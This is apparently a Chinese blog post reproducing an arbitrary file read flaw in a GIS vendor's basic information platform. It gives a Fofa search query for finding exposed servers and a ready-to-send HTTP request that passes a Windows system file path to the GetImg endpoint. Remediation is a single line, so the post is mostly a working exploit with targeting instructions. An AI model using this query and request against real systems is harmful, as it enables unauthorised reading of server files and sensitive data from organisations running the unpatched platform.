地大信息-基础信息平台 GetImg 任意文件读取漏洞复现

0x01 漏洞描述:

武汉地大信息工程股份有限公司(简称"地大信息")是一家以地理信息系统(GIS)为核心技术的信息技术服务企业。该公司主要提供包括但不限于空间数据采集与处理、地理信息系统开发、软件定制开发等服务。

旗下的基础信息平台存在任意文件上传漏洞、任意文件读取漏洞,攻击者可通过该漏洞获取服务器权限,获取主机敏感信息。

0x02 搜索语句:

Fofa:body="/SystemManage/BaseProject" || title=="基础信息平台"

0x03 漏洞复现:

复制代码
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close

0x04 修复建议:

厂商已发布补丁 请及时修复

相关推荐
你的人类朋友37 分钟前
什么是API签名?
前端·后端·安全
深盾安全6 小时前
ProGuard混淆在Android程序中的应用
安全
CYRUS_STUDIO6 小时前
利用 Linux 信号机制(SIGTRAP)实现 Android 下的反调试
android·安全·逆向
白帽黑客沐瑶11 小时前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全11 小时前
符号执行技术实践-求解程序密码
安全
贾维思基12 小时前
被监管警告后,我连夜给系统上了“双保险”!
安全
00后程序员张13 小时前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
Devil枫16 小时前
鸿蒙深链落地实战:从安全解析到异常兜底的全链路设计
安全·华为·harmonyos
lubiii_1 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
你的人类朋友1 天前
🔒什么是HMAC
后端·安全·程序员